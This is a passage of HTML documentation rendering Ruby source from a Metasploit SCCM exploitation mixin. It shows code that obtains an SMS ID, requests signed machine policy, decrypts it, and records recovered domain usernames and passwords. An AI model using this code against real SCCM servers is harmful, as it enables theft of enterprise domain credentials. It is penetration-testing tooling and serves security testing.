<span class='id identifier rubyid_dlog'><span class='object_link'><a href="../../../../top-level-namespace.html#dlog-instance_method" title="#dlog (method)">dlog</a></span></span><span class='lparen'>(</span><span class='id identifier rubyid_http_response'>http_response</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html#UnexpectedReply-constant" title="Msf::Module::Failure::UnexpectedReply (constant)">UnexpectedReply</a></span></span><span class='comma'>,</span> <span class='id identifier rubyid_error'>error</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_parts'>parts</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_content'>content</span><span class='period'>.</span><span class='id identifier rubyid_force_encoding'>force_encoding</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-16le</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_encode'>encode</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-8</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_delete_prefix'>delete_prefix</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\uFEFF</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_compressed_response'>compressed_response</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_zlib_inflate'>zlib_inflate</span><span class='lparen'>(</span><span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_parts'>parts</span><span class='lbracket'>[</span><span class='int'>1</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_content'>content</span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_force_encoding'>force_encoding</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-16le</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_xml_doc'>xml_doc</span> <span class='op'>=</span> <span class='const'>Nokogiri</span><span class='op'>::</span><span class='const'>XML</span><span class='lparen'>(</span><span class='id identifier rubyid_compressed_response'>compressed_response</span><span class='period'>.</span><span class='id identifier rubyid_encode'>encode</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-8</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='rparen'>)</span> <span class='comment'># It&#39;s crazy, but XML parsing doesn&#39;t work with UTF-16-encoded strings
</span> <span class='id identifier rubyid_sms_id'>sms_id</span> <span class='op'>=</span> <span class='id identifier rubyid_xml_doc'>xml_doc</span><span class='period'>.</span><span class='id identifier rubyid_root'>root</span><span class='op'>&amp;.</span><span class='id identifier rubyid_attributes'>attributes</span><span class='op'>&amp;.</span><span class='op'>[]</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SMSID</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='op'>&amp;.</span><span class='id identifier rubyid_value'>value</span><span class='op'>&amp;.</span><span class='id identifier rubyid_delete_prefix'>delete_prefix</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GUID:</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_sms_id'>sms_id</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_approval'>approval</span> <span class='op'>=</span> <span class='id identifier rubyid_xml_doc'>xml_doc</span><span class='period'>.</span><span class='id identifier rubyid_root'>root</span><span class='op'>&amp;.</span><span class='id identifier rubyid_attributes'>attributes</span><span class='op'>&amp;.</span><span class='op'>[]</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ApprovalStatus</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='op'>&amp;.</span><span class='id identifier rubyid_value'>value</span>
<span class='kw'>if</span> <span class='id identifier rubyid_approval'>approval</span> <span class='op'>==</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>-1</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html#UnexpectedReply-constant" title="Msf::Module::Failure::UnexpectedReply (constant)">UnexpectedReply</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Client registration not approved by SCCM server</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html#UnexpectedReply-constant" title="Msf::Module::Failure::UnexpectedReply (constant)">UnexpectedReply</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Did not retrieve SMS ID</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Got SMS ID: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_sms_id'>sms_id</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='lbracket'>[</span><span class='id identifier rubyid_sms_id'>sms_id</span><span class='comma'>,</span> <span class='id identifier rubyid_ip_address'>ip_address</span><span class='rbracket'>]</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="report_creds-instance_method">
#<strong>report_creds</strong>(ip_address, user, password) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/sccm.rb', line 353</span>
<span class='kw'>def</span> <span class='id identifier rubyid_report_creds'>report_creds</span><span class='lparen'>(</span><span class='id identifier rubyid_ip_address'>ip_address</span><span class='comma'>,</span> <span class='id identifier rubyid_user'>user</span><span class='comma'>,</span> <span class='id identifier rubyid_password'>password</span><span class='rparen'>)</span>
<span class='id identifier rubyid_service_data'>service_data</span> <span class='op'>=</span> <span class='lbrace'>{</span>
<span class='label'>address:</span> <span class='id identifier rubyid_ip_address'>ip_address</span><span class='comma'>,</span>
<span class='label'>port:</span> <span class='id identifier rubyid_rport'>rport</span><span class='comma'>,</span>
<span class='label'>protocol:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>tcp</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='label'>service_name:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>sccm</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='label'>workspace_id:</span> <span class='id identifier rubyid_myworkspace_id'>myworkspace_id</span>
<span class='rbrace'>}</span>
<span class='id identifier rubyid_domain'>domain</span><span class='comma'>,</span> <span class='id identifier rubyid_account'>account</span> <span class='op'>=</span> <span class='id identifier rubyid_user'>user</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\\</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_credential_data'>credential_data</span> <span class='op'>=</span> <span class='lbrace'>{</span>
<span class='label'>origin_type:</span> <span class='symbol'>:service</span><span class='comma'>,</span>
<span class='label'>module_fullname:</span> <span class='id identifier rubyid_fullname'>fullname</span><span class='comma'>,</span>
<span class='label'>username:</span> <span class='id identifier rubyid_account'>account</span><span class='comma'>,</span>
<span class='label'>private_data:</span> <span class='id identifier rubyid_password'>password</span><span class='comma'>,</span>
<span class='label'>private_type:</span> <span class='symbol'>:password</span><span class='comma'>,</span>
<span class='label'>realm_key:</span> <span class='const'><span class='object_link'><a href="../../../../Metasploit.html" title="Metasploit (module)">Metasploit</a></span></span><span class='op'>::</span><span class='const'>Model</span><span class='op'>::</span><span class='const'>Realm</span><span class='op'>::</span><span class='const'>Key</span><span class='op'>::</span><span class='const'>ACTIVE_DIRECTORY_DOMAIN</span><span class='comma'>,</span>
<span class='label'>realm_value:</span> <span class='id identifier rubyid_domain'>domain</span>
<span class='rbrace'>}</span>
<span class='id identifier rubyid_credential_core'>credential_core</span> <span class='op'>=</span> <span class='id identifier rubyid_create_credential'>create_credential</span><span class='lparen'>(</span><span class='id identifier rubyid_credential_data'>credential_data</span><span class='period'>.</span><span class='id identifier rubyid_merge'>merge</span><span class='lparen'>(</span><span class='id identifier rubyid_service_data'>service_data</span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_login_data'>login_data</span> <span class='op'>=</span> <span class='lbrace'>{</span>
<span class='label'>core:</span> <span class='id identifier rubyid_credential_core'>credential_core</span><span class='comma'>,</span>
<span class='label'>status:</span> <span class='const'><span class='object_link'><a href="../../../../Metasploit.html" title="Metasploit (module)">Metasploit</a></span></span><span class='op'>::</span><span class='const'>Model</span><span class='op'>::</span><span class='const'>Login</span><span class='op'>::</span><span class='const'>Status</span><span class='op'>::</span><span class='const'>UNTRIED</span>
<span class='rbrace'>}</span>
<span class='id identifier rubyid_create_credential_login'>create_credential_login</span><span class='lparen'>(</span><span class='id identifier rubyid_login_data'>login_data</span><span class='period'>.</span><span class='id identifier rubyid_merge'>merge</span><span class='lparen'>(</span><span class='id identifier rubyid_service_data'>service_data</span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="request_policy-instance_method">
#<strong>request_policy</strong>(http_opts, policy_url, sms_id, key) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Request the policy from the policy_url</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/sccm.rb', line 179</span>
<span class='kw'>def</span> <span class='id identifier rubyid_request_policy'>request_policy</span><span class='lparen'>(</span><span class='id identifier rubyid_http_opts'>http_opts</span><span class='comma'>,</span> <span class='id identifier rubyid_policy_url'>policy_url</span><span class='comma'>,</span> <span class='id identifier rubyid_sms_id'>sms_id</span><span class='comma'>,</span> <span class='id identifier rubyid_key'>key</span><span class='rparen'>)</span>
<span class='id identifier rubyid_policy_url'>policy_url</span><span class='period'>.</span><span class='id identifier rubyid_gsub!'>gsub!</span><span class='lparen'>(</span><span class='tstring'><span class='regexp_beg'>%r{</span><span class='tstring_content'>^https?://&lt;mp&gt;</span><span class='regexp_end'>}</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_policy_url'>policy_url</span> <span class='op'>=</span> <span class='id identifier rubyid_policy_url'>policy_url</span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>{</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>%7B</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>}</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>%7D</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_now'>now</span> <span class='op'>=</span> <span class='const'>Time</span><span class='period'>.</span><span class='id identifier rubyid_now'>now</span><span class='period'>.</span><span class='id identifier rubyid_utc'>utc</span><span class='period'>.</span><span class='id identifier rubyid_iso8601'>iso8601</span>
<span class='id identifier rubyid_client_token'>client_token</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>GUID:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_sms_id'>sms_id</span><span class='embexpr_end'>}</span><span class='tstring_content'>;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_now'>now</span><span class='embexpr_end'>}</span><span class='tstring_content'>;2</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_client_signature'>client_signature</span> <span class='op'>=</span> <span class='id identifier rubyid_rsa_sign'>rsa_sign</span><span class='lparen'>(</span><span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='lparen'>(</span><span class='id identifier rubyid_client_token'>client_token</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x00</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_encode'>encode</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-16le</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_bytes'>bytes</span><span class='period'>.</span><span class='id identifier rubyid_pack'>pack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>C*</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_opts'>opts</span> <span class='op'>=</span> <span class='id identifier rubyid_http_opts'>http_opts</span><span class='period'>.</span><span class='id identifier rubyid_merge'>merge</span><span class='lparen'>(</span><span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>uri</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_policy_url'>policy_url</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>method</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GET</span><span class='tstring_end'>&#39;</span></span>
<span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>headers</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>headers</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_merge'>merge</span><span class='lparen'>(</span><span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ClientToken</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_client_token'>client_token</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ClientTokenSignature</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_client_signature'>client_signature</span>
<span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_http_response'>http_response</span> <span class='op'>=</span> <span class='id identifier rubyid_send_request_raw'>send_request_raw</span><span class='lparen'>(</span><span class='id identifier rubyid_opts'>opts</span><span class='rparen'>)</span>
<span class='id identifier rubyid_http_response'>http_response</span><span class='period'>.</span><span class='id identifier rubyid_gzip_decode!'>gzip_decode!</span>
<span class='id identifier rubyid_ci'>ci</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1.html" title="Rex::Proto::CryptoAsn1 (module)">CryptoAsn1</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/Cms.html" title="Rex::Proto::CryptoAsn1::Cms (module)">Cms</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/Cms/ContentInfo.html" title="Rex::Proto::CryptoAsn1::Cms::ContentInfo (class)">ContentInfo</a></span></span><span class='period'>.</span><span class='id identifier rubyid_parse'>parse</span><span class='lparen'>(</span><span class='id identifier rubyid_http_response'>http_response</span><span class='period'>.</span><span class='id identifier rubyid_body'>body</span><span class='rparen'>)</span>
<span class='id identifier rubyid_cms_envelope'>cms_envelope</span> <span class='op'>=</span> <span class='id identifier rubyid_ci'>ci</span><span class='period'>.</span><span class='id identifier rubyid_enveloped_data'>enveloped_data</span>
<span class='id identifier rubyid_ri'>ri</span> <span class='op'>=</span> <span class='id identifier rubyid_cms_envelope'>cms_envelope</span><span class='lbracket'>[</span><span class='symbol'>:recipient_infos</span><span class='rbracket'>]</span>
<span class='kw'>if</span> <span class='id identifier rubyid_ri'>ri</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span><span class='period'>.</span><span class='id identifier rubyid_empty?'>empty?</span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html#UnexpectedReply-constant" title="Msf::Module::Failure::UnexpectedReply (constant)">UnexpectedReply</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>No recipient infos provided</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>if</span> <span class='id identifier rubyid_ri'>ri</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span><span class='lbracket'>[</span><span class='symbol'>:ktri</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html#UnexpectedReply-constant" title="Msf::Module::Failure::UnexpectedReply (constant)">UnexpectedReply</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>KeyTransRecipientInfo not found</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_body'>body</span> <span class='op'>=</span> <span class='id identifier rubyid_cms_envelope'>cms_envelope</span><span class='lbracket'>[</span><span class='symbol'>:encrypted_content_info</span><span class='rbracket'>]</span><span class='lbracket'>[</span><span class='symbol'>:encrypted_content</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span>
<span class='id identifier rubyid_key_encryption_alg'>key_encryption_alg</span> <span class='op'>=</span> <span class='id identifier rubyid_ri'>ri</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span><span class='lbracket'>[</span><span class='symbol'>:ktri</span><span class='rbracket'>]</span><span class='lbracket'>[</span><span class='symbol'>:key_encryption_algorithm</span><span class='rbracket'>]</span><span class='lbracket'>[</span><span class='symbol'>:algorithm</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span>
<span class='id identifier rubyid_encrypted_rsa_key'>encrypted_rsa_key</span> <span class='op'>=</span> <span class='id identifier rubyid_ri'>ri</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span><span class='lbracket'>[</span><span class='symbol'>:ktri</span><span class='rbracket'>]</span><span class='lbracket'>[</span><span class='symbol'>:encrypted_key</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span>
<span class='kw'>if</span> <span class='id identifier rubyid_key_encryption_alg'>key_encryption_alg</span> <span class='op'>==</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1.html" title="Rex::Proto::CryptoAsn1 (module)">CryptoAsn1</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/OIDs.html" title="Rex::Proto::CryptoAsn1::OIDs (class)">OIDs</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/OIDs.html#OID_RSA_ENCRYPTION-constant" title="Rex::Proto::CryptoAsn1::OIDs::OID_RSA_ENCRYPTION (constant)">OID_RSA_ENCRYPTION</a></span></span><span class='period'>.</span><span class='id identifier rubyid_value'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/OIDs.html#value-class_method" title="Rex::Proto::CryptoAsn1::OIDs.value (method)">value</a></span></span>
<span class='id identifier rubyid_decrypted_key'>decrypted_key</span> <span class='op'>=</span> <span class='id identifier rubyid_key'>key</span><span class='period'>.</span><span class='id identifier rubyid_private_decrypt'>private_decrypt</span><span class='lparen'>(</span><span class='id identifier rubyid_encrypted_rsa_key'>encrypted_rsa_key</span><span class='rparen'>)</span>
<span class='kw'>elsif</span> <span class='id identifier rubyid_key_encryption_alg'>key_encryption_alg</span> <span class='op'>==</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1.html" title="Rex::Proto::CryptoAsn1 (module)">CryptoAsn1</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/OIDs.html" title="Rex::Proto::CryptoAsn1::OIDs (class)">OIDs</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/OIDs.html#OID_RSAES_OAEP-constant" title="Rex::Proto::CryptoAsn1::OIDs::OID_RSAES_OAEP (constant)">OID_RSAES_OAEP</a></span></span><span class='period'>.</span><span class='id identifier rubyid_value'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/OIDs.html#value-class_method" title="Rex::Proto::CryptoAsn1::OIDs.value (method)">value</a></span></span>
<span class='id identifier rubyid_decrypted_key'>decrypted_key</span> <span class='op'>=</span> <span class='id identifier rubyid_key'>key</span><span class='period'>.</span><span class='id identifier rubyid_private_decrypt'>private_decrypt</span><span class='lparen'>(</span><span class='id identifier rubyid_encrypted_rsa_key'>encrypted_rsa_key</span><span class='comma'>,</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>PKey</span><span class='op'>::</span><span class='const'>RSA</span><span class='op'>::</span><span class='const'>PKCS1_OAEP_PADDING</span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html#UnexpectedReply-constant" title="Msf::Module::Failure::UnexpectedReply (constant)">UnexpectedReply</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Key encryption routine is currently unsupported: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_key_encryption_alg'>key_encryption_alg</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_cea'>cea</span> <span class='op'>=</span> <span class='id identifier rubyid_cms_envelope'>cms_envelope</span><span class='lbracket'>[</span><span class='symbol'>:encrypted_content_info</span><span class='rbracket'>]</span><span class='lbracket'>[</span><span class='symbol'>:content_encryption_algorithm</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_algorithms'>algorithms</span> <span class='op'>=</span> <span class='lbrace'>{</span>
<span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1.html" title="Rex::Proto::CryptoAsn1 (module)">CryptoAsn1</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/OIDs.html" title="Rex::Proto::CryptoAsn1::OIDs (class)">OIDs</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/OIDs.html#OID_AES256_CBC-constant" title="Rex::Proto::CryptoAsn1::OIDs::OID_AES256_CBC (constant)">OID_AES256_CBC</a></span></span><span class='period'>.</span><span class='id identifier rubyid_value'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/OIDs.html#value-class_method" title="Rex::Proto::CryptoAsn1::OIDs.value (method)">value</a></span></span> <span class='op'>=&gt;</span> <span class='lbrace'>{</span> <span class='label'>iv_length:</span> <span class='int'>16</span><span class='comma'>,</span> <span class='label'>key_length:</span> <span class='int'>32</span><span class='comma'>,</span> <span class='label'>cipher_name:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>aes-256-cbc</span><span class='tstring_end'>&#39;</span></span> <span class='rbrace'>}</span><span class='comma'>,</span>
